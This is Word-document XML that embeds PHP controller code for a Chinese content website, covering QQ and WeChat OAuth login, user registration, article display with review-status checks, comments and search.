    <w:p w14:paraId="501291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_token = $res[1];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735D8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653B2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id = file_get_contents($url);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E801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callback\((.*?)\)/', $openid, $openid);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449ED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id = json_decode($openid['1'],true)['openid'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA99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penid){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EC66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band')-&gt;where(['code'=&gt;$openid])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F17AC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A314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Db::name('member')-&gt;where(['id'=&gt;$db['uid'],'hide'=&gt;1])-&gt;field('id,password')-&gt;find(); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8FC1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0035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6F191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file_get_contents($url);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3074A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res;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A0B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json_decode($res, true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD9D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his-&gt;user(['openid'=&gt;$openid,'type'=&gt;'qqpc','nickname'=&gt;$res['nickname'],'img'=&gt;$res['figureurl_2'],'info'=&gt;$info]);    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44276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EBCF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6C787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64549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1CD49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member['id'])-&gt;update(['update_time'=&gt;$time,'update_ip'=&gt;$ip]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2381C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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>登录成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43EC75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id'].'|www.ffxiang.cn|'.$member['password'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6176D3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set('user',_encrypt($data),'ffxiangUser');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269DE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url('member/index'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E046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E0A3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error('</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>登录失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08058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2EB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89A9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openid</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获取失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">'); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6A6A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67EA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1904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code</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获取失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">'); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBE6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414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28A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xLogin(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AC06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request()-&gt;root(true).'/'.request()-&gt;path();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0086D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urlencode($url); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50899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type','wxLogin')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4943F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config['0']['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9F0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secret =  $config['1']['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4718C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e = md5(uniqid(rand(), TRUE));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA34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_GET['code']) &amp;&amp; !isset($_SESSION['code'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4EC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4C585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url);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7488B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C25A6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B66C3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_GET['code'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006059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0B58C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file_get_contents($url);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D64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json_decode($res, true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453EE8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res['access_token']) &amp;&amp; isset($res['openid'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19582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band')-&gt;where(['code'=&gt;$res['openid']])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D5E4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false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A58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ECD0F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Db::name('member')-&gt;where(['id'=&gt;$db['uid'],'hide'=&gt;1])-&gt;field('id,password')-&gt;find(); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC6A2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527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6CD96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file_get_contents($url);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4D0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res;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270DF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json_decode($res, true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB85E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his-&gt;user(['openid'=&gt;$res['openid'],'type'=&gt;'wxpc','nickname'=&gt;$res['nickname'],'img'=&gt;$res['headimgurl'],'info'=&gt;$info,'unionid'=&gt;$res['unionid']]);    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0509A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CAA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42B5B7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50462F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2FAAB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member['id'])-&gt;update(['update_time'=&gt;$time,'update_ip'=&gt;$ip]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43420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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>登录成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E461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id'].'|www.ffxiang.cn|'.$member['password'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12740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set('user',_encrypt($data),'ffxiangUser');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A90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url('member/index'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A87B1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BE3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登录失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154B8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E5486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BCB1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access_token</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">openid </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获取失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18728A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2D54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1AD0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code</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获取失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B9E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A7F5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7FB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user($data){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD36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28C23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3D556B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16D8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348B8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md5(rand(100000,999999));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FD9D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password']=$password;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A26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1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469254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76CCD8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create_time']=$time;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8A3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time']=$time;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7184C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ip']=$ip;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6A5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nickname']=$data['nickname'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AC46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img']=$this-&gt;qiniu($data['img']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C14F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insertGetId($map);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9C1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E821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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>注册成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B34C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uid']=$db;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2990C4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ype']=$data['type'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E0FB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code']=$data['openid'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F300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ime']=time();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103B0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info']=$data['info'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C86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db=Db::name('member_band')-&gt;insertGetId($appidmap);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D731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data['type'].'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>绑定</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D12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963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id'=&gt;$db,'password'=&gt;$password];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3022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A97B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type='.jpg'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F29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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288CF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427798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121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2E5D7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537E9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3A578A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B6A3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455AE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4B639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69AD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url.rand(11111,999999)) .$type;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6AF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4AFA1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76564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67B5D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739C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key;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D93E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FD78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0DA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uanzhuList(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70753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nput('post.pages') ? input('post.pages') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D11C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param.type/d') ? input('param.type/d') : 1;     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D991E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input('param.uid/d') ? input('param.uid/d') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462D26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4D242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EC46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331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token()){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113B2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member();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258F1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02A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6ADAA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id='a.gz_uid';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62134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uid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BBCD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4C1D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id='a.uid';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDE99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gz_uid']=$uid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C4C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A51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0E872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w',$auid.'=w.id'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726F12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23F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guanzhu')-&gt;alias('a')-&gt;join($join)-&gt;where($where)-&gt;order('a.id desc')-&gt;field('w.id,w.img')-&gt;fetchSql(false)-&gt;paginate(15)-&gt;toarray(); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40231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C8F3E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v['id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E643A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_imgUrl().$user['img']."?imageView2/1/w/100/h/100";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26272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user['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F299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40F86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Db::name('member_guanzhu')-&gt;where(['uid'=&gt;$member['id'],'gz_uid'=&gt;$v['id']])-&gt;value('id'); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150623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7CF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BFE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F035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324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C6EBB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F175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4EABA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index\controller\Common;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CB25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71684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48D796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rticle extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B95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F6366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73721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7C03FA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isMobileApp()){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9BBE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m/index");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E34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2F5AA2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29DF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874E2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get($url){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771F5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url;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A3F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729755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 = curl_init();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BBA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CURLOPT_URL,$url);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F12C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CURLOPT_POST,$data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363CE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CURLOPT_RETURNTRANSFER,1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A88E4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curl_exec($curl);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AFD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url); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057357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4DFFC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 xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEFE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02C3B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29A68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744DC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676F07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Db::name('slide')-&gt;where('tid',1)-&gt;limit(6)-&gt;cache(_cache('db'))-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296E1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slide',$slide);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E93F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imgUrl',_imgUrl());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFFC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suxiangw');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2936F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10C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B798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2FA954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参数错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E14B0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B18E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18BB5B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Active',$id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A06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id',$id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A129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0EC0A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id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC348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typeid')-&gt;where($where)-&gt;cache(_cache('db'))-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B84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251592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47903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0348CF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list');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4F84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48DB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ew(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFAE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42DC13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参数错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD8F9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DBD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39503F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rticle')-&gt;find($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A34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501A11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内容不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132270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346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session()){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A21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member();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F8A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uid'] &amp;&amp; $name['uid'] == $member['id']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B314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C340B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name['hide']==0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AAE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内容不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3EC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name['hide']==2){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494AA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正在审核，无法查看</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F016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name['hide']==3){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03235E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未通过，无法查看</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDB5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2D2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7A52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CBF4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hide']==0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207ED5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内容不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC036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name['hide']==2){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35080E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正在审核，无法查看</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112D57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name['hide']==3){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1379C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未通过，无法查看</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42179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8A8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8E4E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typeid']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226AC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type_name'] = Db::name('typeid')-&gt;where(['id'=&gt;$name['typeid']])-&gt;cache(true)-&gt;value('title');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C52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84EB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type_name'] = Db::name('mychannel')-&gt;where(['id'=&gt;$name['mychannel']])-&gt;cache(true)-&gt;value('title');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544820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1CED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gt;$id,'hide'=&gt;1])-&gt;setInc('click');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D78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content']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C4DB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src=\"(.*?)\"/", stripslashes($name['content']),$content);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F12E3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ontent[2] as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B9D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trstr($v,'http')){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F755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strpos($v,'/public/uploads/us/') !== false){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D45C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EEF3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content']=str_replace($v,_imgUrl().$v,stripslashes($name['content']));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3709C9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D84B2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C89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5025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mychannel']==2){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C9E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p>
    <w:p w14:paraId="6D81E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sjson = json_decode($name['images'],true) ? json_decode($name['images'],true) : json_decode(htmlspecialchars_decode($name['images']) , true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C250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sjson as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A69A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lt;p class="a-image"&gt;&lt;img src="'._imgUrl().(!empty($v['img']) ? $v['img'] : $v).'"&gt;&lt;/p&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C89C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img_text'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBF1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lt;p class="a-image"&gt;'.$v['img_text'].'&lt;/p&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B59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6E6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0E1D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content']="&lt;p&gt;".$name['description']."&lt;/p&gt;".$content;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559A3A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name['mychannel']==3 || $name['mychannel']==4){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C827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mychannel']==3){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A6F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name['image'] ? $name['image'] : $name['video']."?vframe/jpg/offset/2/w/400/h/400";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D113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68C17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name['image'] ? $name['image'] : $name['video']."?vframe/jpg/offset/2/w/400/h/700";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606F3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827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images=_imgUrl().$videoimages;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759A7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videoimages',$videoimages);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4180A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E90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b::name('member')-&gt;where('id',$name['uid'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1FA3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1AC06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62261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user',$user);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A86A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session()){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2C8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ucang=DB::name('member_favorite')-&gt;where(['aid'=&gt;$id,'uid'=&gt;$name['uid'],'type'=&gt;0])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A457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houcang){$shoucang=0;}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4685C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guanzhu']=db('member_guanzhu')-&gt;where(['uid'=&gt;$member['id'],'gz_uid'=&gt;$name['uid']])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15123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7B3F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ucang=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED8C4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guanzhu']=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF75D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CEE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shoucang']=$shoucang;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6587CF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b::name('article_ping')-&gt;where('aid',$id)-&gt;order('time desc')-&gt;limit(10)-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263B3B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 as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4955E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v['uid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A56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k]['img']=_imgUrl().$user['img']."?imageView2/1/w/100/h/100";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63709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k]['username']=$user['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70536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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF83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member['id']; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB53C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User = Db::name('article_ping_zan')-&gt;where(['pingId' =&gt; $v['id'], 'uid' =&gt; $uid])-&gt;cache(_cache('db'))-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DCD2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k]['zanUser'] = $zanUser;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7091F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85D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415B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content']=str_replace('&lt;div&gt;','',$name['content']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22695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ing',$ping);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3B5F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06D951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view');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2B3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5BC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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4955A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757DD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790F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F39F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2B30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19E4AE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Josn=[];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FFA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ypeid as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F857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Josn[$k]['name']=$v['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D797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ypeidJosn[$k]['channelid']=$v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B92E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Josn[$k]['url']=url('typeid',['id'=&gt;$v['id']]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664108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B8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Josn',$typeidJosn);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382DE2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535B06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page')-&gt;where('id',$id)-&gt;cache(_cache('db'))-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660A1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2D3D5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671D6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35D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earch(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45944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input('search');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C357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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35088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请输入搜索关键词</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2364D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D80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hide'=&gt;1,'tid'=&gt;0])-&gt;order('hide desc,des desc')-&gt;limit(100)-&gt;cache(_cache('db'))-&gt;field('id,title')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131FD1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46B5A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search',$search);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A36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56D1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D07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A22F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B843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29D79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index\controller\Common;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F223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F528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4C40FF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748DF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04628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 as Auth;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5372B3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7266ED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set_time_limit(0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B3E6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p extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8D8A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190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member=null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCF0D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__construct(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E394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arent::__construct();</w:t>
      </w:r>
